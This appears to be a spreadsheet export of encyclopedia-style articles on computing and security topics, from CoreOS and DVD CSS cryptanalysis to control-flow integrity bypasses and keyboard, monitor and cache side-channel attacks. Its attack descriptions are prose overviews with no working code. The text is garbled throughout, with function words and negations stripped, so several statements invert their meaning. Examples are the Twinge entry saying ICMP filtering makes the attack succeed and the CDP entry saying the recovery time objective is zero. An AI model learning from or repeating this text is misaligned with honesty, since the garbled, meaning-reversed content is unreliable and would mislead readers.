prevents failures single cluster members causing data loss. beside configuration management, etcd also provides service discovery allowing deployed applications announce services offer. communication etcd performed exposed rest-based api, internally uses json http; used directly (through curl wget, example), indirectly etcdctl, specialized command-line utility also supplied coreos. etcd also used kubernetes software. container linux also provides fleet cluster manager controls container linux's separate systemd instances cluster level. 2017 "fleet" longer actively developed deprecated favor kubernetes. using fleetd, container linux creates distributed init system ties together separate systemd instances cluster-wide etcd deployment; internally, fleetd daemon communicates local systemd instances d-bus, etcd deployment exposed api. using fleetd allows deployment single multiple containers cluster-wide, advanced options including redundancy, failover, deployment specific cluster members, dependencies containers, grouped deployment containers. command-line utility called fleetctl used configure monitor distributed init system; internally, communicates fleetd daemon using json-based http, also used directly. when used locally cluster member, fleetctl communicates local fleetd instance unix domain socket; used external host, tunneling used authentication provided public keys.all above-mentioned daemons command-line utilities (etcd, etcdctl, fleetd fleetctl) written language distributed terms apache license 2.0. deployment when running dedicated hardware, container linux either permanently installed local storage, hard disk drive (hdd) solid-state drive (ssd), booted remotely network using preboot execution environment (pxe) general, ipxe implementations. coreos also supports deployments various hardware virtualization platforms, including amazon ec2, digitalocean, google compute engine, microsoft azure, openstack, qemu/kvm, vagrant vmware. container linux also installed citrix xenserver, noting "template" coreos exists. container linux also deployed commercial distribution called tectonic, additionally integrates google's kubernetes cluster management utility. april 2015, tectonic planned offered beta software select customers. furthermore, coreos provides flannel component implementing overlay network required primarily integration kubernetes.as february 2015, container linux supports x86-64 architecture. derivatives following acquisition coreos, inc. january 2018, announced would merging coreos container linux hat's project atomic, create operating system, coreos, aligning upstream fedora project open source community around fedora coreos, combining technologies predecessors. march 2018, kinvolk gmbh announced flatcar container linux, derivative coreos container linux. this tracks upstream coreos alpha/beta/stable channel releases, experimental edge release channel added 2019. reception lwn.net reviewed coreos 2014: putting together large, distributed systems—web applications prime example—coreos would appear interesting functionality. allow applications type grow shrink needed demand, well provide stable platform upgrades constant headache. "massive server deployments", coreos, something many characteristics, looks like future. also application virtualization software technology encapsulates application software operating system executed comparison application virtualization software various portable scripting language virtual machines comparison platform virtualization software various emulators hypervisors, emulate whole physical computers (linux containers) environment running multiple isolated linux systems (containers) single linux control host operating-system-level virtualization implementations based operating system kernel's support multiple isolated userspace instances software service (saas) software licensing delivery model hosts software centrally licenses subscription basis virtualization general concept providing virtual versions computer hardware platforms, operating systems, storage devices, etc. references external links official coreos github source code repositories: coreos etcd fleet coreos-overlay coreos distrowatch first glimpse coreos, september 2013, sébastien coreos: linux cloud datacenter, zdnet, july 2014, steven vaughan-nichols what's coreos? existential threat linux vendors, infoworld, october 2014, matt asay understanding coreos distributed architecture, march 2015, talk alex polvi aaron delp brian gracely coreos fleet architecture, august 2014, brian waldon running coreos google compute engine, 2014 coreos moves btrfs ext4 overlayfs, phoronix, january 2015, michael larabel containers persistent data, lwn.net, 2015, josh berkus</t>
  </si>
  <si>
    <t>Twinge attack</t>
  </si>
  <si>
    <t>internet-based computer-networking, twinge attack flood false icmp packets attempt cripple system.the attack spoofed, random fake internet source addresses used icmp packets. this makes identification source malicious packets difficult. idea attack either degrade performance attacked computer make crash. attacking program called twinge, icmp packets particular signature gives identity away.as long computer safely behind router firewall, nothing worry attack. with attack, adversary intends prevent system operating normally, i.e. denial service. configuring upstream network devices (including firewalls routers) ignore icmp packets public internet make almost certainly succeed. references</t>
  </si>
  <si>
    <t>Content Scramble System</t>
  </si>
  <si>
    <t>content scramble system (css) digital rights management (drm) encryption system employed many commercially produced dvd-video discs. utilizes proprietary 40-bit stream cipher algorithm. system introduced around 1996 first compromised 1999.css several complementary systems designed restrict dvd-video access. superseded newer schemes content protection recordable media (cprm), advanced encryption standard (aes) advanced access content system (aacs) scheme used blu-ray disc, 56-bit 128-bit sizes, respectively, providing much higher level security less secure 40-bit size css. preliminary note content scramble system (css) collection proprietary protection mechanisms dvd-video discs. attempts restrict access content licensed applications. according copy control association (cca), consortium grants licenses, supposed protect intellectual property rights content owner. details given licensees fee. license, binds licensee non-disclosure agreement, would permit development open-source software dvd-video playback. instead, libdvdcss, reverse engineered implementation css. libdvdcss source documentation, along publicly available dvd-rom specifications. there also effort collect details various sources.a dvd-video produced without css. publisher instance decide without protection save license production costs. introduction content scramble system deals three participants: disc, drive player. disc holds purported copyright information encrypted feature. drive provides means read disc. player decrypts presents audio visual content feature. participants must conform cca's license agreement. there three protection methods: playback protection based encryption: player requires secret decrypt feature. read protection based drive: access significant disc data granted player authenticates successfully. regional restriction based disc drive: drive deny access disc belong drive's region.the first protection methods broken. circumvention regional protection possible every drive—even drive grants access feature, prediction title keys fail. however, players exist enforce regional restrictions (the user disable protection though), makes regional restrictions less effective component css. disc dvd-rom's main-data (§16), consecutive logical blocks 2048 bytes, structured according dvd-video format. dvd-video contains (besides others) mpeg program stream consists so-called packs. applied disc subset packs encrypted title-key. dvd-rom contains, besides main-data, additional data areas. stores there: flag indicates whether applied (§6.23.3.2.2), 8-bit region-management-information (region code), disc-key-block holds encrypted variants disc-key (§6.23.3.2.3).css also uses bytes frame header logical block user data (§16.3,§6.29.3.1.5): byte copyright management information, five bytes holding encrypted title-key. drive drive treats dvd-video disc dvd-rom disc. player reads disc's user-data processes according dvd-video format. however, drive detects disc compiled css, denies access logical blocks marked copyrighted (§6.15.3). player execute authentication handshake first (§4.10.2.2). authentication handshake also used retrieve disc-key-block title-keys. drive also support regional playback control (rpc) limit playback dvd-video content specific regions world (§3.3.26). phase drives hold 8-bit region-code adhere requirements license agreement (§6.29.3.1.7). appears phase drives reject title-key requests region mismatch. however, reading user-data still work. cipher employs stream cipher mangles keystream plain-text data produce cipher text. stream cipher based linear-feedback shift register (lfsr) 40-bit seed. mangling depends type operation. there three types: decryption disc- title-key, decryption pack encryption keys authentication handshake.in order decrypt dvd-video, player reads disc-key-block uses player-key decrypt disc-key. thereafter, player reads title-keys decrypts disc-key. different title-key assigned video manager video title set. title-keys used decrypt encrypted packs. cryptanalysis employs cryptographic keys size bits. this makes vulnerable brute-force attack. time introduced, forbidden united states manufacturers export cryptographic systems employing keys excess bits, length already shown wholly inadequate face increasing computer processing power (see data encryption standard). based leaked decss source-code, frank stevenson published november 1999 three exploits rendered cipher practically ineffective: correlation attack enables recovery keystream's seed complexity 216. mangling disc- title-keys reversed complexity disc-key recovered hash-value complexity 225.the latter exploit recovers disk-key hash-value less seconds intel pentium iii. design prepared leak player-keys. discs would contain encrypted variant player-keys disc-key-block. however, stevenson's exploits made possible generate player-keys. libdvdcss uses list generated player-keys. there cases title-keys available. drive deny access region mismatch still permit reading encrypted dvd-video. ethan hawke presented plain-text prediction data repetitions mpeg program stream enables recovery title-keys real-time directly encrypted dvd-video.in geeks bearing gifts, author nelson states "dvd encryption intentionally made light encryption committee, based arguments libertarian book computer lib.", claim cited originating personal communication anonymous source; nelson author computer lib. also copy control association libdvdcss, popular free software enabling playback discs opensource players. references external links official website edwards, eddie. "the content scrambling system: technical description". tiny collective. synopsis. archived original 2007-05-06. retrieved 2005-12-29. barry, mark (june 2004). "cryptography home entertainment: look content scrambling dvds". ucsd. math.</t>
  </si>
  <si>
    <t>Content Threat Removal</t>
  </si>
  <si>
    <t>content threat removal (ctr) cyber security technology intended defeat threat posed handling digital content cyberspace. unlike defences, including antivirus software sandboxed execution, rely able detect threats. similar content disarm reconstruction, designed remove threat without knowing whether done acts without knowing data contains threat not. detection strategies work detecting unsafe content, blocking removing content. content deemed safe delivered destination. contrast, content threat removal assumes data hostile delivers none destination, regardless whether actually hostile. although data delivered, business information carried data delivered, using data created purpose. threat advanced attacks continuously defeat defences based detection. these often referred zero-day attacks, soon discovered attack detection mechanisms must updated identify neutralise attack, are, systems unprotected. these attacks succeed attackers skilled finding ways evading detection. polymorphic code used evade detection known unsafe data sandbox detection allows attacks evade dynamic analysis. method content threat removal defence works intercepting data destination. business information carried data extracted data discarded. then entirely new, clean safe data built carry information destination. effect building data carry business information unsafe elements original data left behind discarded. this includes executable data, macros, scripts malformed data trigger vulnerabilities applications. while form content transformation, transformations provide complete defence content threat. applicability applicable user-to-user traffic, email chat, machine-to-machine traffic, services. data transfers intercepted in-line application layer proxies transform information content delivered remove threat.ctr works extracting business information data possible extract information executable code. this means directly applicable browsing, since pages code. can, however, applied content downloaded from, uploaded sites. although pages cannot transformed render safe, browsing isolated remote access protocols used reach isolated environment subjected ctr. provides solution problem stegware. naturally removes detectable steganography eliminates symbiotic permutation steganography normalisation. availability deep secure pioneered development ctr. number products services incorporate ctr, including application layer proxies email services icap (the internet content adaptation protocol) sidecar servers uploaded downloaded content. garrison provide remote desktop isolation solution display content converted video signal recorded video stream, using separate hardware chips. this process removes threat content display content. also content disarm reconstruction deep content inspection references</t>
  </si>
  <si>
    <t>Content sniffing</t>
  </si>
  <si>
    <t>content sniffing, also known media type sniffing mime sniffing, practice inspecting content byte stream attempt deduce file format data within content sniffing generally used compensate lack accurate metadata would otherwise required enable file interpreted correctly. content sniffing techniques tend mixture techniques rely redundancy found file formats: looking file signatures magic numbers, heuristics including searching well-known representative substrings, byte frequency n-gram tables, bayesian inference. mime (multipurpose internet mail extensions) sniffing was, still used browsers, including notably microsoft's internet explorer, attempt help sites correctly signal mime type content display. however, opens serious security vulnerability, which, confusing mime sniffing algorithm, browser manipulated interpreting data allows attacker carry operations expected either site operator user, cross-site scripting. moreover, making sites correctly assign mime types content appear work correctly browsers, fails encourage correct labeling material, turn makes content sniffing necessary sites work, creating vicious circle incompatibility standards security best practices. specification exists media type sniffing html5, attempts balance requirements security need reverse compatibility content missing incorrect mime-type data. attempts provide precise specification used across implementations implement single well-defined deterministic behaviors.the unix file command viewed content sniffing application. charset sniffing numerous browsers limited form content sniffing attempt determine character encoding text files mime type already known. this technique known charset sniffing codepage sniffing and, certain encodings, used bypass security restrictions too. instance, internet explorer tricked jscript circumvention policy allowing browser guess html-file encoded utf-7. this worsened feature utf-7 encoding permits multiple encodings text and, specifically, alternative representations ascii characters. most encodings allow evasive presentations ascii characters, charset sniffing less dangerous general because, historical accident ascii-centric nature scripting markup languages, characters outside ascii repertoire difficult circumvent security boundaries, mis-interpretations character sets tend produce results worse display mojibake. also browser sniffing x-content-type-options header references external links mime sniffing standard masinter (march 2011). "internet media types web". ietf internet-draft. retrieved 2012-07-14. barth, hickson (january 2011). "media type sniffing". ietf internet-draft. retrieved 2012-07-14. david risney. "mime-sniffing". retrieved 2012-07-14.</t>
  </si>
  <si>
    <t>Twelve Tricks</t>
  </si>
  <si>
    <t>twelve tricks trojan horse first appeared around 1990. purdue university issued bulletin trojan march 1990. trojan came altered utility file called coretest.com, intended test performance hard drives. affected platform computers running ms-dos dos. trojan alters master boot record (partition sector) and, every reboot, installs twelve "tricks" causes issues hardware operation computer. trick vanishes power off, twelve tricks appear reappear next reboot. addition, boot trojan uses random number generator determine whether low-level format active copy boot sector first copy fat; 1/4096 chance happening. format happen, trojan randomly changes random word first sixteen sectors fat, leading gradual corruption file system. references external links morality machines 214.</t>
  </si>
  <si>
    <t>Tweaking</t>
  </si>
  <si>
    <t>tweaking refers fine-tuning adjusting complex system, usually electronic device. tweaks small modifications intended improve system. electronics, synonym "trimming." analog circuit boards often small potentiometers components used calibrate adjust board service procedure: small insulated screwdriver used turn often called "tweaker." this echoed name product tweek, popular controversial audio product 1980s, claimed improve electrical characteristics audio switch contacts. hardware hardware tweaking process modifying certain parts hardware changing cables, cleaning heads player branded cleaning fluid oiling moving parts engine best possible oil. computer hardware computer hardware tweaking extension hardware tweaking, specifically geared towards components they include: changing voltage clock rates processing units, modifying unit timing, improving cooling systems reduce chance overheating, etc. tweaks specifically designed allow processor operate higher clock speed normal known overclocking. modifications computer systems aimed increasing performance, quieter fans, external controls, decorations lights windows, known modding. software software tweaking process improving performance application quality output. there ways accomplishing this: manually (that familiar programming; though irrelevant source application closed, built-in means adjust performance) using another piece software specialized purpose. tweaking kind generally increases usability, terms personal configuration preferences, rather objective performance system overall). some precise applications need constant thorough tweaking stay date deliver best possible results. obvious examples fine tuning lame encoder, whose 3.9x branch considered state-of-the-art encoder, also continues shape boundaries codec stay competitive successors. also overclocking modding tweakui references external links tweaking curlie tweakguides.com site various windows game tweak guides-)</t>
  </si>
  <si>
    <t>Continuous Data Protection</t>
  </si>
  <si>
    <t>continuous data protection (cdp), also called continuous backup real-time backup, refers backup computer data automatically saving copy every change made data, essentially capturing every version data user saves. true form allows user administrator restore data point time. technique patented british entrepreneur pete malcolm 1989 backup system copy [editor's emphasis] every change made storage medium recorded change occurs [editor's emphasis]."in ideal case continuous data protection, recovery point objective—"the maximum targeted period data (transactions) might lost service major incident"—is zero, even though recovery time objective—"the targeted duration time service level within business process must restored disaster disruption) order avoid unacceptable consequences associated break business continuity"—is zero. example period data transactions might lost major discount chain card readers checkout counters shut multiple locations close hours month june 2019. runs service captures changes data separate storage location. there multiple methods capturing continuous live data changes involving different technologies serve different needs. true cdp-based solutions provide fine granularities restorable objects ranging crash-consistent images logical objects files, mail boxes, messages, database files logs. this necessarily true near-cdp solutions. differences traditional backup true continuous data protection different traditional backup necessary specify point time recover ready restore. traditional backups restore data time backup made. true continuous data protection, contrast "snapshots", backup schedules. when data written disk, also asynchronously written second location, either another computer network appliance. this introduces overhead disk-write operations eliminates need scheduled backups. allowing restoring data point time, "cdp gold standard—the comprehensive advanced data protection. 'near cdp' technologies deliver enough protection many companies less complexity cost. example, snapshots ["near-cdp" clarification section below] provide reasonable near-cdp-level protection file shares, letting users directly access data file share regular intervals—say, every half hour minutes. that's certainly higher level protection tape-based disk-based nightly backups need." because "near-cdp [copying] pre-set time intervals", essentially incremental backup initiated—separately source machine—by timer instead script. continuous near continuous since true "backup write operations executed level basic input/output system (bios) microcomputer manner normal computer unaffected", true backup must practice conjunction virtual machine equivalent—ruling ordinary personal backup applications. therefore discussed "enterprise client-server backup" article, rather "backup" article. some solutions marketed continuous data protection allow restores fixed intervals minutes hour hours, automatically take incremental backups intervals. such "near-cdp"—short near-continuous data protection—schemes universally recognized true continuous data protection, provide ability restore point time. when interval shorter hour, "near-cdp" solutions—for example backup—are typically based periodic "snapshots"; avoid downtime, high-availability systems instead perform backup read-only copy data frozen point time—and allow applications continue writing data". there debate industry whether granularity backup must "every write" cdp, whether "near-cdp" solution captures data every minutes good enough. latter sometimes called near continuous backup. debate hinges term continuous: whether backup process must continuously automatically scheduled, often sufficient achieve benefits cited above, whether ability restore backup also must continuous. storage networking industry association (snia) uses "every write" definition.there briefer sub-sub-section "backup" article this, renamed "near-cdp" avoid confusion. differences raid, replication mirroring continuous data protection differs raid, replication, mirroring technologies protect copy data (the recent). data becomes corrupted immediately detected, technologies simply protect corrupted data restore uncorrupted version. continuous data protection protects effects data corruption allowing restoration previous, uncorrupted version data. transactions took place corrupting event restoration lost, however. they could recovered means, journaling. backup disk size situations, continuous data protection requires less space backup media (usually disk) traditional backup. most continuous data protection solutions save byte block-level differences rather file-level differences. this means byte file modified, changed byte block backed traditional incremental differential backups make copies entire files; however starting around 2013 enterprise client-server backup applications implemented capability block-level incremental backup, designed large files databases. risks disadvantages when real-time edits—especially multimedia design environments—are backed offsite upstream channel installation's broadband network, network bandwidth throttling needed reduce impact true cdp. alternative approach back separate fibre-channel-connected appliance. also quest appassure cofio software disaster recovery recoverpoint falconstor inmage dr-scout list backup software list online backup services single instance storage cloudendure references</t>
  </si>
  <si>
    <t>Control-flow integrity</t>
  </si>
  <si>
    <t>control-flow integrity (cfi) general term computer security techniques prevent wide variety malware attacks redirecting flow execution (the control flow) program. techniques associated techniques include code-pointer separation (cps), code-pointer integrity (cpi), stack canaries, shadow stacks, vtable pointer verification. implementations related implementations available clang, microsoft's control flow guard return flow guard, google's indirect function-call checks reuse attack protector (rap). clang google android google shipped android linux kernel compiled clang link-time optimization (lto) since 2018. intel control-flow enforcement technology intel control-flow enforcement technology (cet) detects compromises control flow integrity shadow stack (ss) indirect branch tracking (ibt).the shadow stack stores copy return address call specially-protected shadow stack. ret, processor checks return address stored normal stack shadow stack equal. addresses equal, processor generates (control flow protection fault). indirect branch tracking detects indirect call instructions unauthorized targets. implemented adding internal state machine processor. behavior indirect call instructions changed switch state machine idle wait_for_endbranch. wait_for_endbranch state, next instruction executed required endbranch instruction (endbr32 32-bit mode endbr64 64-bit mode), changes internal state machine wait_for_endbranch back idle. thus every authorized target indirect call must begin endbranch. processor wait_for_endbranch state (meaning, previous instruction indirect call), next instruction endbranch instruction, processor generates (control flow protection fault). processors supporting indirect branch tracking, endbranch instructions interpreted nops effect. microsoft control flow guard control flow guard (cfg) first released windows update (kb3000850) november 2014. developers programs adding /guard:cf linker flag program linking visual studio 2015 newer.as windows creators update (windows version 1703), windows kernel compiled cfg. windows kernel uses hyper-v prevent malicious kernel code overwriting bitmap.cfg operates creating per-process bitmap, indicates address valid destination. before performing indirect function call, application checks destination address bitmap. destination address bitmap, program terminates. this makes difficult attacker exploit use-after-free replacing object's contents using indirect function call execute payload. implementation details protected indirect function calls, _guard_check_icall function called, performs following steps: convert target address offset number bitmap. highest bytes byte offset bitmap offset 5-bit value. first four bits low-order bits address. offset destination address aligned 0x10 (last four bits not. examine target's address value bitmap target address bitmap, return without error. target address bitmap, terminate program. bypass techniques there several generic techniques bypassing cfg: destination code located non-cfg module loaded process. find indirect call protected (either call jmp). function call different number arguments call designed for, causing stack misalignment, code execution function returns (patched windows 10). function call number arguments, pointers passed treated object writes pointer-based offset, allowing overwriting return address. overwrite function call used validate address (patched march 2015) bitmap 1's, allowing indirect function calls controlled-write primitive overwrite address stack (since stack protected cfg) microsoft extended flow guard extended flow guard (xfg) officially released yet, available windows insider preview publicly presented bluehat shanghai 2019.xfg extends validating function call signatures ensure indirect function calls subset functions signature. function call signature validation implemented adding instructions store target function's hash register immediately prior indirect call storing calculated function hash memory immediately preceding target address's code. when indirect call made, validation function compares value target function's stored hash. also buffer overflow protection return-oriented programming references</t>
  </si>
  <si>
    <t>Turris Omnia</t>
  </si>
  <si>
    <t>turris omnia started crowdfunded open-source soho network router developed cz.nic association. january 2016 turris omnia presented fosdem 2016.routers campaign delivered 2016. after that, routers started sold various resellers including alza.cz, amazon various local resellers. design turris omnia designed provide owner freedom use. uses open-source software. addition, creators published electrical schematics.it also incorporates several security measures. features automated software updates, software vulnerabilities addressed quickly, unique feature among soho routers. also enables dnssec default also allows people easily participate distributed adaptive firewall tries automatically identify attackers collecting data numerous sources. apart that, router yields sufficient performance handle gigabit traffic double home server, print server. funding funding turris omnia initially funded crowdfunding campaign indiegogo target us$100 january 2016. deadline passed, funding reached us$857 000.at campaign, funding reached us$.since then, router sold retail various resellers. specifications powered dual-core marvell armada cpu. base model flash storage, real-time clock battery backup, module hardware cryptographically secure pseudorandom number generator. mini express supports wi-fi form mimo 802.11ac older mimo 802.11b/g/n. connectivity consists gigabit ports ports mini express msata mini express card slotinitially devices shipped default upgrade available, however default configuration. software turris omnia runs turris openwrt derivative. managed interfaces well cli. main interface reforis successor legacy foris; offers features regular users, configuration system reboot. advanced users utilize luci, standard user interface openwrt. references external links official website</t>
  </si>
  <si>
    <t>Cookie Monster (computer program)</t>
  </si>
  <si>
    <t>cookie monster program created 1969 several computer operating systems. program named obnoxious cartoon bear advertising cereal, later became associated muppet cookie monster. started computer users brown university annoy fellow students manually sending messages blocking computer processes demanding cookies user ransomed computer typed “cookie”. though often called virus, self-replicate spread, considered proto-virus, simply malware instead. unrelated http cookie. when c.d. tavares heard idea mit, decided automate since then, program shared different operating systems.the automated program series minicomputers later replicated atari strains, called cookie monster virus difference virus survive system reset system completely powered down. atari version function original program, time pops automatically regular intervals, sometimes appears ever frequent program "fed" cookies. order remove program completely, user must type "oreo". version program, demand cookies would flash screen ever rapidly would suddenly stop print didn’t want cookie anyway,” desist.the program inspired movie hackers include fictitious "cookie monster virus" "ate" system data gibson supercomputer. stopped (presumably temporarily) system administrator typed "cookie". references</t>
  </si>
  <si>
    <t>Computer system</t>
  </si>
  <si>
    <t>Computer security compromised by hardware failure</t>
  </si>
  <si>
    <t>computer security compromised hardware failure branch computer security applied hardware. objective computer security includes protection information property theft, corruption, natural disaster, allowing information property remain accessible productive intended users. such secret information could retrieved different ways. this article focus retrieval data thanks misused hardware hardware failure. hardware could misused exploited secret data. this article collects main types attack lead data theft. computer security comprised devices, keyboards, monitors printers (thanks electromagnetic acoustic emanation example) components computer, memory, network card processor (thanks time temperature analysis example). devices monitor monitor main device used access data computer. shown monitors radiate reflect data environment, potentially giving attackers access information displayed monitor. electromagnetic emanations video display units radiate: narrowband harmonics digital clock signals broadband harmonics various 'random' digital signals video signal.known compromising emanations tempest radiation, code word u.s. government programme aimed attacking problem, electromagnetic broadcast data significant concern sensitive computer applications. eavesdroppers reconstruct video screen content radio frequency emanations. each (radiated) harmonic video signal shows remarkable resemblance broadcast signal. therefore possible reconstruct picture displayed video display unit radiated emission means normal television receiver. preventive measures taken, eavesdropping video display unit possible distances several hundreds meters, using normal black-and-white receiver, directional antenna antenna amplifier. even possible pick information types video display units distance kilometer. sophisticated receiving decoding equipment used, maximum distance much greater. compromising reflections what displayed monitor reflected environment. time-varying diffuse reflections light emitted monitor exploited recover original monitor image. this eavesdropping technique spying distance data displayed arbitrary computer screen, including currently prevalent monitors. technique exploits reflections screen's optical emanations various objects commonly finds close proximity screen uses reflections recover original screen content. such objects include eyeglasses, pots, spoons, plastic bottles, even user. this attack successfully mounted even small fonts using inexpensive, off-the-shelf equipment (less 1500 dollars) distance meters. relying expensive equipment allowed conduct attack meters away, demonstrating similar attacks feasible side street close building.many objects found usual workplace exploited retrieve information computer's display outsider. particularly good results obtained reflections user's eyeglasses located desk next screen. reflections stem user also provide good results. however, eyes harder distance fast-moving objects require high exposure times. using expensive equipment lower exposure times helps remedy problem.the reflections gathered curved surfaces close objects indeed pose substantial threat confidentiality data displayed screen. fully invalidating threat without time hiding screen legitimate user seems difficult, without using curtains windows similar forms strong optical shielding. most users, however, aware risk willing close curtains nice day. reflection object, computer display, curved mirror creates virtual image located behind reflecting surface. flat mirror virtual image size located behind mirror distance original object. curved mirrors, however, situation complex. keyboard electromagnetic emanations computer keyboards often used transmit confidential data passwords. since contain electronic components, keyboards emit electromagnetic waves. these emanations could reveal sensitive information keystrokes. electromagnetic emanations turned constitute security threat computer equipment. figure presents keystroke retrieved material necessary. approach acquire signal directly antenna process entire captured electromagnetic spectrum. thanks method, four different kinds compromising electromagnetic emanations detected, generated wired wireless keyboards. these emissions lead full partial recovery keystrokes. best practical attack fully recovered keystrokes ps/2 keyboard distance meters, even walls. because keyboard specific fingerprint based clock frequency inconsistencies, determine source keyboard compromising emanation, even multiple keyboards model used time.the four different kinds compromising electromagnetic emanations described below. falling edge transition technique when pressed, released held down, keyboard sends packet information known scan code computer. protocol used transmit scan codes bidirectional serial communication, based four wires: volts), ground, data clock. clock data signals identically generated. hence, compromising emanation detected combination signals. however, edges data clock lines superposed. thus, easily separated obtain independent signals. generalized transition technique falling edge transition attack limited partial recovery keystrokes. this significant limitation. falling edge transition attack improved, recover almost keystrokes. indeed, traces, exactly data rising edge. attackers able detect transition, fully recover keystrokes. modulation technique harmonics compromising electromagnetic emissions come unintentional emanations radiations emitted clock, non-linear elements, crosstalk, ground pollution, etc. determining theoretically reasons compromising radiations complex task. these harmonics correspond carrier approximately likely internal clock micro-controller inside keyboard. these harmonics correlated clock data signals, describe modulated signals amplitude frequency) full state clock data signals. this means scan code completely recovered harmonics. matrix scan technique keyboard manufacturers arrange keys matrix. keyboard controller, often 8-bit processor, parses columns one-by-one recovers state keys once. this matrix scan process described keys (some keys used, instance modern keyboards 104/105 keys) arranged columns rows. these columns continuously pulsed one-by-one least 3μs. thus, leads antenna generate electromagnetic emanations. attacker able capture emanations, easily recover column pressed key. even signal fully describe pressed key, still gives partial information transmitted scan code, i.e. column number.note matrix scan routine loops continuously. when pressed, still signal composed multiple equidistant peaks. these emanations used remotely detect presence powered computers. concerning wireless keyboards, wireless data burst transmission used electromagnetic trigger detect exactly pressed, matrix scan emanations used determine column belongs summary some techniques target keyboards. this table sums technique could used find keystroke different kind keyboard. paper called "compromising electromagnetic emanations wired wireless keyboards", martin vuagnoux sylvain pasini tested different keyboard models, ps/2, connectors wireless communication different setups: semi-anechoic chamber, small office, adjacent office flat building. table presents results. acoustic emanations attacks emanations caused human typing attracted interest recent years. particular, works showed keyboard acoustic emanations leak information exploited reconstruct typed text.pc keyboards, notebook keyboards vulnerable attacks based differentiating sound emanated different keys. this attack takes input audio signal containing recording single word typed single person keyboard, dictionary words. assumed typed word present dictionary. attack reconstruct original word signal. this attack, taking input 10-minute sound recording user typing english text using keyboard, recovering typed characters. this attack inexpensive hardware required parabolic microphone non-invasive require physical intrusion system. attack employs neural network recognize pressed. combines signal processing efficient data structures algorithms, successfully reconstruct single words 7-13 characters recording clicks made typing keyboard. sound clicks differ slightly key, keys positioned different positions keyboard plate, although clicks different keys sound similar human ear.on average, incorrect recognitions clicks, shows exposure keyboard eavesdropping using attack. attack efficient, taking seconds word standard better success rate finding correct word words characters, success rate words tested. practice, human attacker typically determine text random. attacker also identify occasions user types user names passwords. short audio signals containing single word, seven characters long considered. this means signal seconds long. such short words often chosen password. dominant factors affecting attack's success word length, importantly, number repeated characters within word.this procedure makes possible efficiently uncover word audio recordings keyboard click sounds. more recently, extracting information another type emanations demonstrated: acoustic emanations mechanical devices dot-matrix printers. video eavesdropping keyboard while extracting private information watching somebody typing keyboard might seem easy task, becomes extremely challenging automated. however, automated tool needed case long-lasting surveillance procedures long user activity, human able reconstruct characters minute. paper "clearshot: eavesdropping keyboard input video" presents novel approach automatically recovering text typed keyboard, based solely video user typing.automatically recognizing keys pressed user hard problem requires sophisticated motion analysis. experiments show that, human, reconstructing sentences requires lengthy hours slow-motion analysis video. attacker might install surveillance device room victim, might take control existing camera exploiting vulnerability camera's control software, might simply point mobile phone integrated camera laptop's keyboard victim working public space.balzarotti's analysis divided main phases (figure below). first phase analyzes video recorded camera using computer vision techniques. frame video, computer vision analysis computes keys likely pressed, keys certainly pressed, position space characters. because results phase analysis noisy, second phase, called text analysis, required. goal phase remove errors using language context-sensitive techniques. result phase reconstructed text, word represented list possible candidates, ranked likelihood. printer acoustic emanations with acoustic emanations, attack recovers dot-matrix printer processing english text printing possible. based record sound printer makes, microphone close enough this attack recovers printed words, knowledge text done, microphone distance printer.after upfront training phase ("a" picture below), attack ("b" picture below) fully automated uses combination machine learning, audio processing, speech recognition techniques, including spectrum features, hidden markov models linear classification. fundamental reason reconstruction printed text works that, emitted sound becomes louder needles strike paper given time. there correlation number needles intensity acoustic emanation.a training phase conducted words dictionary printed characteristic sound features words extracted stored database. trained characteristic features used recognize printed english text. but, task trivial. major challenges include identifying extracting sound features suitably capture acoustic emanation dot-matrix printers; compensating blurred overlapping features induced substantial decay time emanations; identifying eliminating wrongly recognized words increase overall percentage correctly identified words (recognition rate). computer components network interface card timing attack timing attacks enable attacker extract secrets maintained security system observing time takes system respond various queries.ssh designed provide secure channel hosts. despite encryption authentication mechanisms uses, weaknesses. interactive mode, every individual keystroke user types sent remote machine separate packet immediately pressed, leaks inter-keystroke timing information users’ typing. below, picture represents command processed connection. simple statistical techniques suffice reveal sensitive information length users’ passwords even root passwords. using advanced statistical techniques timing information collected network, eavesdropper learn significant information users type sessions. because time takes operating system send packet keypress general negligible comparing interkeystroke timing, also enables eavesdropper learn precise interkeystroke timings users’ typing arrival times packets. memory physical chemistry data remanence problems affect obvious areas non-volatile memory cells also occur areas device hot-carrier effects (which change characteristics semiconductors device) various effects examined alongside obvious memory-cell remanence problems. possible analyse recover data cells semiconductor devices general long theory) vanished.electromigration, means physically move atom locations physically alter device itself) another type attack. involves relocation metal atoms high current densities, phenomenon atoms carried along "electron wind" opposite direction conventional current, producing voids negative electrode hillocks whiskers positive electrode. void formation leads local increase current density joule heating (the interaction electrons metal ions produce thermal energy), producing electromigration effects. when external stress removed, disturbed system tends relax back original equilibrium state, resulting backflow heals electromigration damage. long term though, cause device failure, less extreme cases simply serves alter device's operating characteristics noticeable ways. example, excavations voids leads increased wiring resistance growth whiskers leads contact formation current leakage. example conductor exhibits whisker growth electromigration shown figure below: example exhibits void formation case severe enough complete failure) shown figure: temperature contrary popular assumption, drams used modern computers retain contents several seconds power lost, even room temperature even removed motherboard.many products cryptographic security-related computations using secret keys variables equipment's operator must able read alter. usual solution secret data kept volatile memory inside tamper-sensing enclosure. security processors typically store secret material static ram, power removed device tampered with. temperatures contents sram ‘frozen’. interesting know period time static device retain data power removed. temperatures increase data retention time sram many seconds even minutes. read/write exploits thanks firewire maximillian dornseif presented technique slides, take control apple computer thanks ipod. attacks needed first generic phase ipod software modified behaves master firewire bus. then ipod full read/write access apple computer ipod plugged firewire port. firewire used audio devices, printers, scanners, cameras, gps, etc. generally, device connected firewire full access (read/write). indeed, ohci standard (firewire standard) reads physical requests, including physical read, physical write lock requests registers (section 5.5), handled directly host controller without assistance system software. device connected firewire read write data computer memory. example, device grab screen contents just search memory strings login, passwords scan possible material search cryptographic keys stored parse whole physical memory understand logical memory layout.or mess memory change screen content change uid/gid certain process inject code process inject additional process. processor cache attack increase computational power, processors generally equipped cache memory decreases memory access latency. below, figure shows hierarchy processor memory. first processor looks data cache memory. when data processor looking for, called cache-miss. below, pictures show processor fetch data cache levels. unfortunately caches contain small portion application data introduce additional latency memory transaction case miss. this involves also additional power consumption activation memory devices memory hierarchy. miss penalty already used attack symmetric encryption algorithms, like des. basic idea proposed paper force cache miss processor executing encryption algorithm known plain text. attacks allow unprivileged process attack process running parallel processor, despite partitioning methods memory protection, sandboxing virtualization. timing attack carefully measuring amount time required perform private operations, attackers able find fixed diffie-hellman exponents, factor keys, break cryptosystems. against vulnerable system, attack computationally inexpensive often requires known ciphertext. attack treated signal detection problem. signal consists timing 